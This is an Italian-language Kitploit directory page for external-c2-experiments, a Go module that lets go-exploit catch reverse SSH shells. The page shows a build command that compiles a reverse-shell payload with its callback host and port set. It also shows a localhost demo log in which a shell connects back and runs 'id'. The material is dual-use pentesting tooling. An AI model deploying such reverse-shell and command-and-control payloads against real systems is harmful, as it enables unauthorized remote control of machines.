Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
external-c2-experiments — Modulo C2 esterno in Go per go-exploit che intercetta reverse SSH shell, fornendo un listener server e un client payload per integrare profili C2 personalizzati negli exploit. | Kitploit
Strumenti/GitHubGitHub/vulncheck-oss/external-c2-experiments
Framework di ExploitExploitPost-ExploitPenetration TestingCommand and ControlUtilità e FrameworkRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubvulncheck-oss/external-c2-experiments

external-c2-experiments

Modulo C2 esterno in Go per go-exploit che intercetta reverse SSH shell, fornendo un listener server e un client payload per integrare profili C2 personalizzati negli exploit.

Vedi Repository
111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

External C2: SSH

Un modulo C2 esterno go-exploit che supporta reverse SSH shell. Funge inoltre da dimostrazione di come integrare profili C2 esterni nei tuoi payload preferiti. L'obiettivo non è fornire un payload completamente weaponizzato con evasion e tecniche avanzate, ma mostrare come creare canali per payload che possono implementare moduli di evasion più robusti e integrarsi facilmente in go-exploit.

Struttura

  • Il pacchetto principale c2ssh che implementa le interfacce e le strutture per configurare un server atto a intercettare payload SSH
  • ./payload contiene l'implementazione dei payload da utilizzare da parte di un exploit; funzionalmente è il client SSH e un sottile wrapper attorno a exec basato sulla risposta del server
  • ./example contiene un test di self-exploitation che esegue un payload di esempio compilato

Esempio di utilizzo

  1. Compila il payload da usare nell'exploit per renderlo accessibile all'exploit; attualmente questo è disaccoppiato dal framework perché non usi sempre payload Go :)
  2. Esegui l'exploit
go build -ldflags "-s -w -X main.Rshost=127.0.0.1 -X main.Rsport=2223" -o reverse_shell
poptart@grimm $ go run example/exploit.go -lhost 127.0.0.1 -lport 2222 -rhost 127.0.0.1 -rport 1337 -e -fll DEBUG -ell DEBUG -t 0
time=2024-08-06T12:09:02.762-06:00 level=DEBUG msg="Using the HTTP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
time=2024-08-06T12:09:02.763-06:00 level=STATUS msg="Starting target" index=0 host=127.0.0.1 port=1337 ssl=false "ssl auto"=false
time=2024-08-06T12:09:02.763-06:00 level=DEBUG msg="External SSH Listener starting: 127.0.0.1:2222"
time=2024-08-06T12:09:02.766-06:00 level=DEBUG msg="SSH: Handshaking for 127.0.0.1:38878"
time=2024-08-06T12:09:02.768-06:00 level=STATUS msg="Active shell SSH: Connection accepted from [email protected]:38878 session: 451e905e22ffbc7ab6235ad73379eeea2c65ba532405d81a431e1c5159ba1179 (SSH-2.0-OpenSSH_9.7)"
id
time=2024-08-06T12:09:04.725-06:00 level=STATUS msg="Running command on SSH client: 'id'"
time=2024-08-06T12:09:08.812-06:00 level=SUCCESS msg="uid=1000(poptart) gid=100(users) groups=100(users),1(wheel),67(libvirtd)\n"
Scarica lo strumento